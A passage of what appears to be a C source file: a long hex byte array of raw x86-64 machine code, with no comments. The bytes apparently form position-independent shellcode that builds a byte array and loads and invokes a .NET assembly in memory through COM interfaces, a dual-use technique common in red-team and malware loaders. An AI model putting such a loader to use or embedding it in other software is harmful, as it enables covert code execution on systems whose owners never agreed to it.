655 0x70, 0x03, 0x00, 0x00, 0x48, 0x05, 0x08, 0x0d, 0x00, 0x00, 0x48, 0x8b,
656 0x8d, 0x00, 0x03, 0x00, 0x00, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48,
657 0x89, 0xc1, 0xe8, 0x45, 0x53, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x03,
658 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x95, 0x70, 0x03, 0x00,
659 0x00, 0x48, 0x8d, 0x8a, 0x00, 0x0c, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8,
660 0x05, 0x50, 0x00, 0x00, 0x48, 0x89, 0x85, 0xf8, 0x02, 0x00, 0x00, 0x48,
661 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x18, 0x05, 0x00,
662 0x00, 0x48, 0x39, 0x85, 0xf8, 0x02, 0x00, 0x00, 0x74, 0x07, 0xb8, 0x00,
663 0x00, 0x00, 0x00, 0xeb, 0x06, 0x8b, 0x85, 0x44, 0x03, 0x00, 0x00, 0x48,
664 0x81, 0xc4, 0xd0, 0x03, 0x00, 0x00, 0x5b, 0x5e, 0x5d, 0xc3, 0x55, 0x48,
665 0x81, 0xec, 0x70, 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00,
666 0x00, 0x00, 0x48, 0x89, 0x8d, 0x00, 0x02, 0x00, 0x00, 0x48, 0x89, 0x95,
667 0x08, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x85, 0x10, 0x02, 0x00, 0x00, 0xc7,
668 0x85, 0xec, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xe4,
669 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x02,
670 0x00, 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0,
671 0x0f, 0x84, 0x7c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00,
672 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x85, 0x10,
673 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x00, 0x02, 0x00, 0x00, 0x48, 0x81,
674 0xc2, 0x34, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x00, 0x02, 0x00, 0x00,
675 0x48, 0x81, 0xc1, 0x24, 0x08, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xec,
676 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88,
677 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x02, 0x00, 0x00, 0x48,
678 0x83, 0xc0, 0x0c, 0x48, 0x8d, 0x55, 0xb0, 0x49, 0x89, 0xd0, 0x48, 0x89,
679 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x02, 0x00, 0x00, 0xe8, 0xa4, 0xeb, 0xff,
680 0xff, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
681 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x18, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00,
682 0x00, 0x4c, 0x8d, 0x40, 0x08, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00,
683 0x48, 0x8d, 0x88, 0x44, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02,
684 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x55, 0xb0, 0x4d, 0x89, 0xc1,
685 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xec,
686 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88,
687 0x9f, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48,
688 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x40, 0x50, 0x48, 0x8b,
689 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8d, 0x95,
690 0xbc, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85,
691 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f,
692 0x88, 0x81, 0x00, 0x00, 0x00, 0x8b, 0x85, 0xbc, 0x01, 0x00, 0x00, 0x85,
693 0xc0, 0x74, 0x77, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
694 0x40, 0x08, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x48, 0x48, 0x8b, 0x85,
695 0x10, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x40, 0x10, 0x48, 0x8b, 0x85, 0x00,
696 0x02, 0x00, 0x00, 0x48, 0x8d, 0x88, 0x64, 0x08, 0x00, 0x00, 0x48, 0x8b,
697 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x54, 0x08, 0x00, 0x00,
698 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x4d,
699 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89,
700 0x85, 0xec, 0x01, 0x00, 0x00, 0xeb, 0x1f, 0x48, 0x8b, 0x85, 0x10, 0x02,
701 0x00, 0x00, 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0e,
702 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x00, 0x00, 0x00,
703 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x78, 0x13, 0x48,
704 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00,
705 0x00, 0x48, 0x85, 0xc0, 0x75, 0x52, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00,
706 0x00, 0x48, 0x8b, 0x80, 0x70, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x10,
707 0x02, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x10, 0x48, 0x8b, 0x8d, 0x00, 0x02,
708 0x00, 0x00, 0x4c, 0x8d, 0x81, 0x64, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x8d,
709 0x00, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc1, 0x54, 0x08, 0x00, 0x00, 0x48,
710 0x89, 0x54, 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba, 0x00,
711 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85,
712 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x79,
713 0x19, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x10,
714 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x20, 0x03,
715 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40,
716 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x50, 0x48, 0x8b, 0x85, 0x10,
717 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0xff, 0xd2,
718 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00,
719 0x00, 0x0f, 0x88, 0xe5, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x02,
720 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x01, 0x00, 0x00, 0x84, 0xc0, 0x75,
721 0x39, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10,
722 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x40, 0x68, 0x48, 0x8b, 0x85, 0x10, 0x02,
723 0x00, 0x00, 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00,
724 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89,
725 0x85, 0xec, 0x01, 0x00, 0x00, 0xe9, 0x9f, 0x00, 0x00, 0x00, 0x48, 0x8b,
726 0x85, 0x08, 0x02, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x01, 0x00, 0x00, 0x48,
727 0x8d, 0x55, 0xb0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
728 0x00, 0x02, 0x00, 0x00, 0xe8, 0x5c, 0xe9, 0xff, 0xff, 0x48, 0x8b, 0x85,
729 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x48,
730 0x8d, 0x45, 0xb0, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x85, 0xd8,
731 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
732 0x40, 0x10, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x60, 0x48, 0x8b, 0x85,
733 0x10, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x18, 0x48, 0x8b, 0x85, 0x10,
734 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x95, 0xd8, 0x01,
735 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48,
736 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x48,
737 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x10, 0x01, 0x00,
738 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff,
739 0xd2, 0x83, 0xbd, 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xee, 0x01,
740 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40,
741 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x08, 0x48, 0x8b, 0x85, 0x10, 0x02,
742 0x00, 0x00, 0x48, 0x8d, 0x48, 0x20, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00,
743 0x00, 0x48, 0x8d, 0x90, 0x74, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10,
744 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x49, 0x89, 0xc8, 0x48, 0x89,
745 0xc1, 0x41, 0xff, 0xd1, 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd,
746 0xec, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x9d, 0x01, 0x00, 0x00, 0xc7,
747 0x85, 0xc4, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
748 0x08, 0x02, 0x00, 0x00, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x89, 0x85,
749 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48,
750 0x8b, 0x80, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x01, 0x00,
751 0x00, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xb9, 0x11, 0x00,
752 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48,
753 0x83, 0xbd, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x47, 0x01, 0x00,
754 0x00, 0xc7, 0x85, 0xe8, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
755 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89,
756 0x85, 0xc8, 0x01, 0x00, 0x00, 0xeb, 0x2f, 0x8b, 0x95, 0xe8, 0x01, 0x00,
757 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02,
758 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe8, 0x01, 0x00,
759 0x00, 0x0f, 0xb6, 0x84, 0x02, 0x28, 0x05, 0x00, 0x00, 0x88, 0x01, 0x83,
760 0x85, 0xe8, 0x01, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x08, 0x02, 0x00,
761 0x00, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x39, 0x85, 0xe8, 0x01, 0x00,
762 0x00, 0x72, 0xbc, 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b,
763 0x40, 0x20, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x88, 0x68, 0x01, 0x00, 0x00,
764 0x48, 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x48, 0x28, 0x48,
765 0x8b, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x8b,
766 0x95, 0xd0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41,
767 0xff, 0xd1, 0x89, 0x85, 0xec, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xec, 0x01,
768 0x00, 0x00, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0xe4,
769 0x01, 0x00, 0x00, 0xc7, 0x85, 0xe8, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
770 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x10,
771 0x48, 0x89, 0x85, 0xc8, 0x01, 0x00, 0x00, 0xeb, 0x44, 0x48, 0x8b, 0x95,
772 0x08, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe8, 0x01, 0x00, 0x00, 0xc6, 0x84,
773 0x02, 0x28, 0x05, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xe8, 0x01, 0x00, 0x00,
774 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x48,
775 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x8b, 0x85, 0xe8, 0x01, 0x00, 0x00,
776 0x0f, 0xb6, 0x84, 0x02, 0x28, 0x05, 0x00, 0x00, 0x88, 0x01, 0x83, 0x85,
777 0xe8, 0x01, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x08, 0x02, 0x00, 0x00,
778 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x39, 0x85, 0xe8, 0x01, 0x00, 0x00,
779 0x72, 0xa7, 0x48, 0x8b, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x90,
780 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48,
781 0x89, 0xc1, 0xff, 0xd2, 0x8b, 0x85, 0xe4, 0x01, 0x00, 0x00, 0x48, 0x81,
782 0xc4, 0x70, 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec,
783 0x68, 0x03, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00,
784 0x48, 0x89, 0x8d, 0x00, 0x03, 0x00, 0x00, 0x48, 0x89, 0x95, 0x08, 0x03,
785 0x00, 0x00, 0x4c, 0x89, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x85,
786 0xd8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xa8,
787 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x30, 0x02,
788 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x38, 0x02, 0x00,
789 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x40, 0x02, 0x00, 0x00,
790 0x00, 0x00, 0x00, 0x00, 0x66, 0xc7, 0x85, 0x0a, 0x02, 0x00, 0x00, 0x00,
791 0x00, 0x48, 0x8b, 0x85, 0x08, 0x03, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8,
792 0x02, 0x0f, 0x85, 0xc1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03,
793 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x80,
794 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48,
795 0x8d, 0x50, 0x38, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b,
796 0x40, 0x28, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85, 0xd4, 0x02,
797 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x69,
798 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b,
799 0x40, 0x38, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00,
800 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48,
801 0x8d, 0x95, 0xa8, 0x02, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0,
802 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x02, 0x00, 0x00,
803 0x00, 0x0f, 0x88, 0x80, 0x06, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03,
804 0x00, 0x00, 0x4c, 0x8b, 0x88, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
805 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x00, 0x02, 0x00, 0x00, 0x49,
806 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff,
807 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03,
808 0x00, 0x00, 0x4c, 0x8b, 0x88, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
809 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x04, 0x02, 0x00, 0x00, 0x49,
810 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff,
811 0xd1, 0x89, 0x85, 0xd4, 0x02, 0x00, 0x00, 0x8b, 0x85, 0x04, 0x02, 0x00,
812 0x00, 0x8b, 0x95, 0x00, 0x02, 0x00, 0x00, 0x29, 0xd0, 0x83, 0xc0, 0x01,
813 0x89, 0x85, 0xb4, 0x02, 0x00, 0x00, 0x83, 0xbd, 0xb4, 0x02, 0x00, 0x00,
814 0x00, 0x0f, 0x84, 0xe5, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03,
815 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe0, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01,
816 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00,
817 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x8b,
818 0x85, 0x08, 0x03, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00,
819 0x84, 0xc0, 0x0f, 0x84, 0xf7, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08,
820 0x03, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55,
821 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x03,
822 0x00, 0x00, 0xe8, 0xf6, 0xe4, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00, 0x03,
823 0x00, 0x00, 0x4c, 0x8b, 0x80, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55,
824 0xec, 0x48, 0x8d, 0x45, 0xf0, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x48,
825 0x89, 0x85, 0xb8, 0x02, 0x00, 0x00, 0x66, 0xc7, 0x85, 0x50, 0x02, 0x00,
826 0x00, 0x08, 0x20, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b,
827 0x80, 0xe0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x41, 0x89, 0xd0, 0xba,
828 0x00, 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
829 0x89, 0x85, 0x58, 0x02, 0x00, 0x00, 0xc7, 0x85, 0x0c, 0x02, 0x00, 0x00,
830 0x00, 0x00, 0x00, 0x00, 0xeb, 0x66, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00,
831 0x00, 0x48, 0x8b, 0x98, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00,
832 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x8b, 0x85,
833 0x0c, 0x02, 0x00, 0x00, 0x89, 0xc0, 0x48, 0x8d, 0x0c, 0xc5, 0x00, 0x00,
834 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x02, 0x00, 0x00, 0x48, 0x01, 0xc8,
835 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0xc1, 0x48,
836 0x8b, 0x85, 0x58, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00,
837 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0x8b, 0x85, 0x0c,
838 0x02, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0x85, 0x0c, 0x02, 0x00, 0x00,
839 0x8b, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x39, 0xd0, 0x72,
840 0x8d, 0xeb, 0x7b, 0x66, 0xc7, 0x85, 0x50, 0x02, 0x00, 0x00, 0x08, 0x20,
841 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe0, 0x00,
842 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00,
843 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x58,
844 0x02, 0x00, 0x00, 0xc7, 0x85, 0x0c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
845 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x98, 0xe8,
846 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b,
847 0x90, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x0a, 0x02, 0x00, 0x00,
848 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x85, 0x58,
849 0x02, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00, 0x00, 0x49, 0x89,
850 0xc8, 0x48, 0x89, 0xc1, 0xff, 0xd3, 0xc7, 0x85, 0x0c, 0x02, 0x00, 0x00,
851 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x4c,
852 0x8b, 0x88, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x50, 0x02, 0x00,
853 0x00, 0x48, 0x8d, 0x95, 0x0c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8,
854 0x02, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1,
855 0x66, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x01, 0x00, 0x48, 0xc7, 0x85,
856 0x38, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10,
857 0x03, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x4c, 0x8b,
858 0x90, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00,
859 0x48, 0x8b, 0x48, 0x38, 0x48, 0x8b, 0x85, 0x30, 0x02, 0x00, 0x00, 0x48,
860 0x8b, 0x95, 0x38, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x89,
861 0x55, 0xc8, 0x48, 0x8b, 0x85, 0x40, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45,
862 0xd0, 0x4c, 0x8d, 0x85, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xd8,
863 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xc0, 0x4d, 0x89, 0xc1, 0x49, 0x89,
864 0xd0, 0x48, 0x89, 0xc2, 0x41, 0xff, 0xd2, 0x89, 0x85, 0xd4, 0x02, 0x00,
865 0x00, 0x48, 0x83, 0xbd, 0xd8, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x90,
866 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b,
867 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x58, 0x02, 0x00, 0x00,
868 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00,
869 0x48, 0x8b, 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x02,
870 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0xe9, 0x57, 0x03, 0x00, 0x00,
871 0x48, 0x8b, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x38, 0x00,
872 0x00, 0x00, 0x00, 0xe9, 0x43, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08,
873 0x03, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x55,
874 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x03,
875 0x00, 0x00, 0xe8, 0x7a, 0xe2, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00, 0x03,
876 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45,
877 0xf0, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x85, 0xc8, 0x02, 0x00,
878 0x00, 0x48, 0x83, 0xbd, 0xc8, 0x02, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8,
879 0x00, 0x00, 0x00, 0x00, 0xe9, 0xf3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
880 0x08, 0x03, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8d,
881 0x55, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00,
882 0x03, 0x00, 0x00, 0xe8, 0x25, 0xe2, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x00,
883 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8d,
884 0x45, 0xf0, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x85, 0xc0, 0x02,
885 0x00, 0x00, 0x48, 0x83, 0xbd, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84,
